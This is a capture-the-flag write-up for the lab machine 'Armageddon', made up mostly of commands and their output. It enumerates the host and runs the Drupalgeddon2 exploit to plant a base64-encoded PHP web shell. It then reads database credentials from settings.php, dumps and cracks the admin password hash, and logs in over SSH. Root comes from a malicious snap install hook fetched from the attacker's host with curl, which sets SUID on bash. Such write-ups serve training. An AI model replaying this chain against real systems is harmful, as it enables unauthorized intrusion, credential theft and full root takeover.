$ nmap -v -p- -A 10.10.10.233 --min-rate 5000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-27 10:26 EDT
...
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-title: Welcome to Armageddon | Armageddon
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
....
Nmap done: 1 IP address (1 host up) scanned in 22.78 seconds
Site inspection:

$ whatweb http://10.10.10.233
http://10.10.10.233 [200 OK] Apache[2.4.6], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[10.10.10.233], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PHP[5.4.16], PasswordField[pass], PoweredBy[Arnageddon], Script[text/javascript], Title[Welcome to Armageddon | Armageddon], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/5.4.16]
We are facing a Drupal 7 CMS.
$ dirsearch -u http://10.10.10.233/ -i 200
...
Target: http://10.10.10.233/
[10:52:58] Starting:
[10:53:00] 200 - 317B - /.editorconfig
[10:53:01] 200 - 174B - /.gitignore
[10:53:05] 200 - 1KB - /COPYRIGHT.txt
[10:53:05] 200 - 109KB - /CHANGELOG.txt
[10:53:06] 200 - 2KB - /INSTALL.pgsql.txt
[10:53:06] 200 - 2KB - /INSTALL.mysql.txt
[10:53:06] 200 - 18KB - /INSTALL.txt
[10:53:06] 200 - 18KB - /LICENSE.txt
[10:53:06] 200 - 9KB - /MAINTAINERS.txt
[10:53:06] 200 - 5KB - /README.txt
[10:53:07] 200 - 10KB - /UPGRADE.txt
[10:53:34] 200 - 10KB - /includes/
[10:53:34] 200 - 7KB - /index.php
[10:53:35] 200 - 3KB - /install.php
[10:53:37] 200 - 132KB - /includes/bootstrap.inc
[10:53:41] 200 - 9KB - /modules/
[10:53:47] 200 - 278B - /profiles/testing/testing.info
[10:53:47] 200 - 271B - /profiles/minimal/minimal.info
[10:53:47] 200 - 743B - /profiles/standard/standard.info
[10:53:49] 200 - 2KB - /robots.txt
[10:53:49] 200 - 3KB - /scripts/
[10:53:51] 200 - 0B - /sites/example.sites.php
[10:53:51] 200 - 904B - /sites/README.txt
[10:53:51] 200 - 151B - /sites/all/libraries/README.txt
[10:53:51] 200 - 1KB - /sites/all/modules/README.txt
[10:53:51] 200 - 1020B - /sites/all/themes/README.txt
[10:53:54] 200 - 2KB - /themes/
[10:53:58] 200 - 2KB - /web.config
[10:54:04] 200 - 42B - /xmlrpc.php
Task Completed
http://10.10.10.233/includes/bootstrap.inc
Specifically, it is a Drupal v7.56.
...
/**
* The current system version.
*/
define('VERSION', '7.56');
...
Let’s see if this Drupal version has some vulnerability.

CVE-2018-7600
https://github.com/dreadlocked/Drupalgeddon2
$ git clone https://github.com/dreadlocked/Drupalgeddon2.git
$ ruby drupalgeddon2.rb http://10.10.10.233
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.233/
--------------------------------------------------------------------------------
[+] Found : http://10.10.10.233/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo MNRXASHW
[+] Result : MNRXASHW
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://10.10.10.233/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://10.10.10.233/shell.php' -d 'c=hostname'
armageddon.htb>>
armageddon.htb>> whoami
apache
armageddon.htb>> pwd
/var/www/html
armageddon.htb>> ls /var/www/html/sites -la
total 12
drwxr-xr-x. 4 apache apache 75 Jun 21 2017 .
drwxr-xr-x. 9 apache apache 4096 May 28 16:46 ..
-rw-r--r--. 1 apache apache 904 Jun 21 2017 README.txt
drwxr-xr-x. 5 apache apache 52 Jun 21 2017 all
dr-xr-xr-x. 3 apache apache 67 Dec 3 2020 default
-rw-r--r--. 1 apache apache 2365 Jun 21 2017 example.sites.php
armageddon.htb>> ls /var/www/html/sites/default -la
total 56
dr-xr-xr-x. 3 apache apache 67 Dec 3 2020 .
drwxr-xr-x. 4 apache apache 75 Jun 21 2017 ..
-rw-r--r--. 1 apache apache 26250 Jun 21 2017 default.settings.php
drwxrwxr-x. 3 apache apache 37 Dec 3 2020 files
-r--r--r--. 1 apache apache 26565 Dec 3 2020 settings.php
armageddon.htb>> cat /var/www/html/sites/default/settings.php
...
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
...
Mysql password = CQHEy@9M*m23gBVj
armageddon.htb>> whereis mysql
mysql: /usr/bin/mysql /usr/lib64/mysql /usr/share/mysql /usr/share/man/man1/mysql.1.gz
armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj
armageddon.htb>>
This TTY and/or app not working as expected, so we can try to use -e param to run queries directly.
armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'show databases;'
Database
information_schema
drupal
mysql
performance_schema
armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'use drupal; select * from users'
uid name pass mail theme signature signature_format created access login status timezone language picture init data
0 NULL 0 0 0 0 NULL 0 NULL
1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:"overlay";i:1;}
We have a Drupal hashed password.
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
$ hashcat -m 7900 drupal.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.5) starting
...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7900 (Drupal7)
Hash.Target......: $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
Time.Started.....: Sat May 28 18:29:24 2022 (2 secs)
Time.Estimated...: Sat May 28 18:29:26 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 176 H/s (9.94ms) @ Accel:32 Loops:1024 Thr:1 Vec:2
Recovered........: 1/1 (100.00%) Digests
Progress.........: 256/14344385 (0.00%)
Rejected.........: 0/256 (0.00%)
Restore.Point....: 192/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:31744-32768
Candidate.Engine.: Device Generator
Candidates.#1....: alyssa -> freedom
Hardware.Mon.#1..: Util: 82%
Started: Sat May 28 18:28:48 2022
Stopped: Sat May 28 18:29:27 2022
so, the password is = booboo
Credentials:
brucetherealadmin:booboo
$ ssh brucetherealadmin@10.10.10.233
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ED25519 key fingerprint is SHA256:rMsnEyZLB6x3S3t/2SFrEG1MnMxicQ0sVs9pFhjchIQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ED25519) to the list of known hosts.
brucetherealadmin@10.10.10.233's password:
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$
[brucetherealadmin@armageddon ~]$ ls
user.txt
[brucetherealadmin@armageddon ~]$ cat user.txt
ede8XXXXXXXXXXXXXXXXXXXXXXXXXXXX
Now let’s get our’s root flag.
[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User brucetherealadmin may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/snap install *
We can use snap install as root.
According to https://gtfobins.github.io/gtfobins/snap/ we can use nmap to run commands.
COMMAND=id
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta
sudo snap install xxxx_1.0_all.snap --dangerous --devmode
First, we need to install fpm (if not previously installed).
https://github.com/jordansissel/fpm
$ sudo gem install fpm
[brucetherealadmin@armageddon ~]$ cp /usr/bin/bash .
[brucetherealadmin@armageddon ~]$ ls -la
total 960
drwx------. 2 brucetherealadmin brucetherealadmin 111 may 29 10:02 .
drwxr-xr-x. 3 root root 31 dic 3 2020 ..
-rwxr-xr-x. 1 brucetherealadmin brucetherealadmin 964536 may 29 10:02 bash
lrwxrwxrwx. 1 root root 9 dic 11 2020 .bash_history -> /dev/null
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 18 abr 1 2020 .bash_logout
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 193 abr 1 2020 .bash_profile
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 231 abr 1 2020 .bashrc
-r--------. 1 brucetherealadmin brucetherealadmin 33 may 28 16:33 user.txt
Now we create a new snap package that will be uploaded to the box.
$ COMMAND="chown root:root /home/brucetherealadmin/bash;chmod 4755 /home/brucetherealadmin/bash"
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n aaa -s dir -t snap -a all meta
Created package {:path=>"aaa_1.0_all.snap"}
This package will set the bash we copied into bruce’s directory to have the SUID permission.
$ sudo python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.233 - - [29/May/2022 11:15:15] "GET /aaa_1.0_all.snap HTTP/1.1" 200 -
[brucetherealadmin@armageddon ~]$ curl http://10.10.14.31:8000/aaa_1.0_all.snap -o aaa.snap
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4096 100 4096 0 0 46520 0 --:--:-- --:--:-- --:--:--
[brucetherealadmin@armageddon ~]$ sudo snap install aaa.snap --dangerous --devmode
error: cannot perform the following tasks:
- Run install hook of "aaa" snap if present (run hook "install": exit status 1)
[brucetherealadmin@armageddon ~]$ ls -la
total 964
drwx------. 2 brucetherealadmin brucetherealadmin 127 may 29 10:15 .
drwxr-xr-x. 3 root root 31 dic 3 2020 ..
-rw-rw-r--. 1 brucetherealadmin brucetherealadmin 4096 may 29 10:15 aaa.snap
-rwsr-xr-x. 1 root root 964536 may 29 10:02 bash
lrwxrwxrwx. 1 root root 9 dic 11 2020 .bash_history -> /dev/null
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 18 abr 1 2020 .bash_logout
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 193 abr 1 2020 .bash_profile
-rw-r--r--. 1 brucetherealadmin brucetherealadmin 231 abr 1 2020 .bashrc
-r--------. 1 brucetherealadmin brucetherealadmin 33 may 28 16:33 user.txt
[brucetherealadmin@armageddon ~]$ ./bash -p
bash-4.2#
-p parameter will turn on privileged mode.
https://linux.die.net/man/1/bash
bash-4.2# cd /root/
bash-4.2# ls
anaconda-ks.cfg cleanup.sh passwd reset.sh root.txt snap
bash-4.2# cat root.txt
a2e8XXXXXXXXXXXXXXXXXXXXXXXXXXXX